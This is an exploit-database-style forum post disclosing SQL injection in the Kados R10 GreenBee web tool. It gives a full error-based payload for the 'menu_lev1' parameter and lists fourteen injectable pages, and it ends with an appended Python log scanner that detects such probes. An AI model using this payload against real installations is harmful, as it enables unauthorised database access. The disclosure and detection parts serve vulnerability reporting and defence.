Kados R10 GreenBee - Multiple SQL Vuln.
by storix - 05-30-2019, 10:38 PM
===========================================================================================
# Exploit Title: Kados R10 GreenBee - 'menu_lev1' SQL Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Kybre
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - SQLi
# Parameters : menu_lev1
# Attack Pattern : -1%27%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 
# GET Method : http://localhost/kados_r10/kados/projects.php?menu_lev1=-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
# http://localhost/kados_r10/kados/administration/languages.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/administration/news.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/administration/parameters.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/administration/profiles.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/administration/users.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/app_admin/app_columns.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/app_admin/external_connections.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/app_admin/template_tags.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/app_admin/template_tags_groups.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/app_admin/templates_project.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/my_profile.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/my_profile_password.php?menu_lev1=%27[SQL Inject Here]
# http://localhost/kados_r10/kados/template_checklist.php?menu_lev1=%27[SQL Inject Here]

# exploit-db.com : https://www.exploit-db.com/exploits/46505
===========================================================================================
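
For defenders reviewing web-server logs on a Kados install, a check for the request pattern listed in the post above, as an added example (not part of the original post or the Kados project). It flags requests whose URL-decoded `menu_lev1` value contains a quote or SQL keywords and groups them by client; the log lines are constructed, and the benign value `projects` and the function name are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format) for illustration only.
SAMPLE_LOG = """\
192.0.2.10 - - [30/May/2019:22:38:01 +0000] "GET /kados_r10/kados/projects.php?menu_lev1=projects HTTP/1.1" 200 5120
198.51.100.7 - - [30/May/2019:22:38:05 +0000] "GET /kados_r10/kados/my_profile.php?menu_lev1=%27 HTTP/1.1" 200 812
198.51.100.7 - - [30/May/2019:22:38:06 +0000] "GET /kados_r10/kados/administration/users.php?menu_lev1=-1%27%2b(SELECT+COUNT(*)+FROM+INFORMATION_SCHEMA.COLLATIONS)%2b%27 HTTP/1.1" 200 903
192.0.2.10 - - [30/May/2019:22:39:00 +0000] "GET /kados_r10/kados/index.php HTTP/1.1" 200 2048
"""

# Client address, then the request target inside the quoted request line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# A quote or SQL keywords/functions in the decoded value. Assumes legitimate
# menu_lev1 values are plain identifiers (assumption, not confirmed by the page).
SQL_MARKERS = re.compile(
    r"'|\b(?:select|union|concat|floor|rand|information_schema)\b|group\s+by",
    re.IGNORECASE,
)


def find_menu_lev1_probes(log_text):
    """Return {client_ip: [(path, decoded_value), ...]} for suspicious requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # parse_qs URL-decodes the value: %27 -> ', %2b -> +, and + -> space.
        for value in parse_qs(url.query, keep_blank_values=True).get("menu_lev1", []):
            if SQL_MARKERS.search(value):
                hits[client].append((url.path, value))
    return dict(hits)


if __name__ == "__main__":
    for client, probes in find_menu_lev1_probes(SAMPLE_LOG).items():
        print(client, len(probes), "suspicious request(s)")
        for path, value in probes:
            print("   ", path, "->", value)
```

A single client hitting several of the listed pages with a flagged `menu_lev1` value is a stronger signal than one isolated match.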